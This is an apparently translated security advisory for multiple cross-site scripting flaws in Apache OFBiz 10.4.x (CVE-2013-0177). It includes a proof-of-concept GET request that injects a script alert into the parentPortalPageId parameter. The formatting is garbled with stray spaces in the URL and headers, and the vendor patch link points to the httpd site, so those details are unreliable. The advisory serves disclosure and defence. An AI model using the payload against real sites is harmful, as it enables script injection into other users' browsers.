Multiple Cross-Site Scripting Vulnerabilities in Apache OFBiz

Release date:
Updated on:

Affected Systems:
Apache Group OfBiz 10.4.2
Apache Group OfBiz 10.4.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57463
CVE (CAN) ID: CVE-2013-0177
 
Apache Open For Business (Apache OFBiz) is an Open-source ERP system.
 
Apache versions earlier than 10.04.05 and 11.04.02 have multiple cross-site scripting vulnerabilities. Attackers can exploit these vulnerabilities to execute arbitrary HTML and script code in the browsers of affected sites.
 
<* Source: Juan Caillava
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
GET
/Exampleext/control/ManagePortalPages? ParentPortalPageId = EXAMPLE & quot; & amp; gt; & amp; lt; script & amp; gt; alert (& quot; xss & quot;) & amp; lt; /script & amp; gt;
HTTP/1.1
Host: www.example.com: 8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv: 17.0) Gecko/20100101
Firefox/17.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: es-ar, es; q = 0.8, en-us; q = 0.5, en; q = 0.3
Connection: keep-alive
Referer: https://www.example.com: 8443/exampleext/control/main? ExternalLoginKey = EL367731470037
Cookie: JSESSIONID = C3E2C59FDC670DC004A562861681C092. jvm1; OFBiz. Visitor = 10002

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
 
Http://httpd.apache.org/